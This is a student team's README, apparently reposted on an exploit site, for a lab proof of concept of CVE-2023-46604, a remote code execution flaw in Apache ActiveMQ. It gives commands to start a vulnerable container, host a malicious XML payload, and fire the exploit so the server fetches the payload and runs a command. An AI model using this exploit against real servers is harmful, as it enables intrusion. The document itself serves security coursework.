Share
## https://sploitus.com/exploit?id=BD5C816C-E485-50D6-8E9B-26FB4DC85762
# CVE-2023-46604: Apache ActiveMQ RCE Proof of Concept
**Assignment:** SSP Assignment 3
**Team:** RCE You Later
**Members:** Banica Horia Alexandru, Comarlau Vlad-Constantin

## ๐Ÿšจ Overview
This repository contains a fully functional Proof-of-Concept (PoC) for **CVE-2023-46604**.
This vulnerability allows an attacker to execute arbitrary shell commands on a vulnerable Apache ActiveMQ server (version 5.15.10) by forcing it to deserialize a malicious XML configuration file.

**Goal:** Create a file named `pwned_by_ssp_team` inside the victim server to prove we have control.

---

## ๐Ÿ› ๏ธ Prerequisites
Before running the exploit, ensure you have:
1.  **Docker & Docker Compose** (Installed and running)
2.  **Python 3**

---

## ๐Ÿ“‚ Repository Structure
*   `vulnerable-env/`: Contains the Docker setup for the victim server.
*   `attacker/`: Contains the exploit scripts and malicious payloads.
    *   `exploit.py`: The Python script that sends the malicious packet.
    *   `serve.py`: A simple HTTP server to host the XML payload.
    *   `poc.xml`: The malicious configuration file that contains the command `touch /tmp/pwned_by_ssp_team`.

---

## ๐Ÿš€ Step-by-Step Usage Guide

### Step 1: Start the Victim (ActiveMQ)
We will run an old, vulnerable version of ActiveMQ using Docker.

1.  Open a terminal.
2.  Navigate to the `vulnerable-env` folder:
    ```bash
    cd vulnerable-env
    ```
3.  Start the container:
    ```bash
    docker-compose up -d
    ```
4.  Wait 30 seconds for the server to fully start.

### Step 2: Host the Malicious XML
The victim server needs to download instructions from us. We will set up a small web server to host these instructions.

1.  Open a **second terminal**.
2.  Navigate to the `attacker` folder:
    ```bash
    cd attacker
    ```
3.  Start the Python web server:
    ```bash
    python3 serve.py
    ```
    *Keep this terminal open! You should see "Serving HTTP on 0.0.0.0 port 8000..."*

### Step 3: Launch the Exploit
Now we send the specific network packet that triggers the vulnerability.

1.  Open a **third terminal**.
2.  Navigate to the `attacker` folder:
    ```bash
    cd attacker
    ```
3.  Run the exploit script.
    *   **Note:** If you are on **macOS** or **Windows**, use the command below exactly as written.
    
    ```bash
    python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
    ```

    *   **Linux Users:** If you are on Linux, replace `host.docker.internal` with your the gateway of the network bridge, usually: 172.17.0.1. Try to get the address like so if the prescribed one does not work: docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

### Step 4: Verify the Hack
Did it work? Let's check if the file was created inside the container.

1.  Go back to your first terminal (or any terminal).
2.  Run this command to check the `/tmp` folder inside the victim:
    ```bash
    docker exec activemq-victim ls -l /tmp
    ```
3.  **Success:** You should see a file named `pwned_by_ssp_team`.

## ๐Ÿงน Cleanup
To stop and remove the vulnerable container:
```bash
cd vulnerable-env
docker-compose down